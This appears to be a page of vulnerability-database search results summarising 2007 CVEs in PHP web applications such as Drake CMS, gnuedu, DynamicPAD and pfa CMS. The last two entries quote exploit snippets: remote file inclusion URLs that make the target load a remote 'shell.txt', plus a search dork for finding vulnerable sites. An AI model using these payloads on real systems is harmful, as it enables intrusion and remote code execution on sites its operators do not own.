
7210 matches found

Prion
added 2007/05/11 4:19 p.m. | 11 views

CRLF injection

CRLF injection vulnerability in index.php in Drake CMS 0.4.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the lang parameter. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We d...

CVSS 5.1 | AI score 7.5 | EPSS 0.0119
Exploits: 0 | References: 5 | Affected Software: 1

CVE
added 2007/05/11 4:0 p.m. | 44 views

CVE-2007-2618

The CVE-2007-2618 issue affects Drake CMS 0.4.0, identifying a CRLF injection vulnerability in index.php. The root cause is a CRLF sequence in the lang parameter that enables an attacker to inject arbitrary HTTP headers and perform HTTP response splitting. Public details describe the vulnerable c...

CVSS 5.1 | AI score 7 | EPSS 0.0119
Exploits: 0 | References: 5 | Affected Software: 1

Prion
added 2007/05/11 10:19 a.m. | 11 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the (a) ETCDIR parameter to (1) libs/lom.php; (2) lom_update.php, (3) check-lom.php, and (4) weigh_keywords.php in scripts/; the (b) LIBSDIR parameter to (5) logout.php, (6) help.php...

CVSS 7.5 | AI score 8.2 | EPSS 0.09676
Exploits: 0 | References: 13 | Affected Software: 1

CVE
added 2007/05/11 10:0 a.m. | 53 views

CVE-2007-2609

CVE-2007-2609 affects gnuedu 1.3b2 with multiple PHP remote file inclusion vulnerabilities. An attacker can trigger arbitrary PHP code execution by supplying untrusted values to the ETCDIR parameter for files/libs (libs/lom.php; lom_update.php; check-lom.php; weigh_keywords.php; web/lom.php) and...

CVSS 7.5 | AI score 7.7 | EPSS 0.09676
Exploits: 0 | References: 13 | Affected Software: 1

Prion
added 2007/05/09 9:19 p.m. | 12 views

SQL injection

SQL injection vulnerability in index.php in the wfquotes 1.0 0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action...

CVSS 7.5 | AI score 9.1 | EPSS 0.01003
Exploits: 1 | References: 5 | Affected Software: 1

CVE
added 2007/05/09 9:0 p.m. | 45 views

CVE-2007-2574

The CVE-2007-2574 entry describes a directory traversal vulnerability in Archangel Weblog 0.90.02, where an attacker can read arbitrary files by supplying a .. (dot dot) path in the index parameter of index.php. This is caused by improper validation of the index parameter, enabling access to file...

CVSS 5 | AI score 6.7 | EPSS 0.0243
Exploits: 0 | References: 2 | Affected Software: 1

NVD
added 2007/05/09 6:19 p.m. | 13 views

CVE-2007-2562

Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the _m parameter...

CVSS 4.3 | AI score 5.7 | EPSS 0.01028
Exploits: 0 | References: 4

Prion
added 2007/05/09 6:19 p.m. | 16 views

Remote file inclusion

PHP remote file inclusion vulnerability in index.php in phpFullAnnu CMS (pfa CMS) 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the repinc parameter. NOTE: CVE disputes this issue since $repinc is set to a constant value before use...

CVSS 7.5 | AI score 7.8 | EPSS 0.01548
Exploits: 0 | References: 5 | Affected Software: 1

CVE
added 2007/05/09 6:0 p.m. | 41 views

CVE-2007-2562

Vulnerability summary (CVE-2007-2562): Kayako eSupport 3.00.90 is affected by a cross-site scripting (XSS) flaw in index.php, exploitable via the _m parameter. The underlying issue is unsanitized input passed through this parameter, allowing remote attackers to inject arbitrary web script or HTM...

CVSS 4.3 | AI score 5.7 | EPSS 0.01028
Exploits: 0 | References: 4 | Affected Software: 1

Cvelist
added 2007/05/09 6:0 p.m. | 20 views

CVE-2007-2562

Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the _m parameter...

AI score 5.7 | EPSS 0.01028
Exploits: 0 | References: 4

CVE
added 2007/05/09 6:0 p.m. | 44 views

CVE-2007-2558

CVE-2007-2558 concerns a PHP remote file inclusion in the web app pfa CMS (phpFullAnnu CMS) version 6.0, specifically in index.php via the repinc parameter. The vulnerability is described as enabling remote PHP code execution through a URL if repinc is used to include code. However, the CVE notes...

CVSS 7.5 | AI score 7.5 | EPSS 0.01548
Exploits: 0 | References: 5 | Affected Software: 1

Prion
added 2007/05/09 5:19 p.m. | 664 views

Directory traversal

Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. (dot dot) in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...

CVSS 5.1 | AI score 7.4 | EPSS 0.07506
Exploits: 2 | References: 9 | Affected Software: 1

Cvelist
added 2007/05/09 5:0 p.m. | 32 views

CVE-2007-0609

Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. (dot dot) in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...

AI score 7.1 | EPSS 0.07506
Exploits: 2 | References: 9

NVD
added 2007/05/09 10:19 a.m. | 18 views

CVE-2007-2548

Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and a remote attack vector, related to "Cookie Manipulation."...

CVSS 6.4 | AI score 6.7 | EPSS 0.0101
Exploits: 0 | References: 4

CVE
added 2007/05/09 10:0 a.m. | 46 views

CVE-2007-2548

Summary: CVE-2007-2548 concerns TurnkeyWebTools SunShop Shopping Cart 4.0 with an issue in index.php described as a vulnerability tied to cookie manipulation and a remote attack vector. The exact impact is listed as unknown in the description. The available data indicate a remote, low-complexity...

CVSS 6.4 | AI score 6.7 | EPSS 0.0101
Exploits: 0 | References: 4 | Affected Software: 1

Cvelist
added 2007/05/09 10:0 a.m. | 19 views

CVE-2007-2548

Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and a remote attack vector, related to "Cookie Manipulation."...

AI score 6.7 | EPSS 0.0101
Exploits: 0 | References: 4

CVE
added 2007/05/09 10:0 a.m. | 45 views

CVE-2007-2549

CVE-2007-2549 affects TurnKeyWebTools SunShop Shopping Cart 4.0. SQL injection in index.php via the (1) c or (2) quantity parameter allows remote attackers to execute arbitrary SQL commands. Root cause is unsanitized input in index.php that enables SQL commands to reach the database. The connecte...

CVSS 7.5 | AI score 8.2 | EPSS 0.01195
Exploits: 1 | References: 6 | Affected Software: 1

CVE
added 2007/05/08 11:0 p.m. | 58 views

CVE-2007-2527

The CVE affects DynamicPAD prior to version 1.03.31. It exposes multiple PHP remote file inclusion vulnerabilities that allow an attacker to execute arbitrary PHP code by supplying a crafted URL in the HomeDir parameter to either dp_logs.php or index.php. The underlying issue is a remote file inc...

CVSS 7.5 | AI score 7.7 | EPSS 0.03642
Exploits: 0 | References: 8 | Affected Software: 1

seebug.org
added 2007/05/08 12:0 a.m. | 39 views

DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities

No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt?...

AI score 7.1
Exploits: 0

Packet Storm
added 2007/05/08 12:0 a.m. | 103 views

pfacms-rfi.txt

pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...

AI score 7.4
Exploits: 0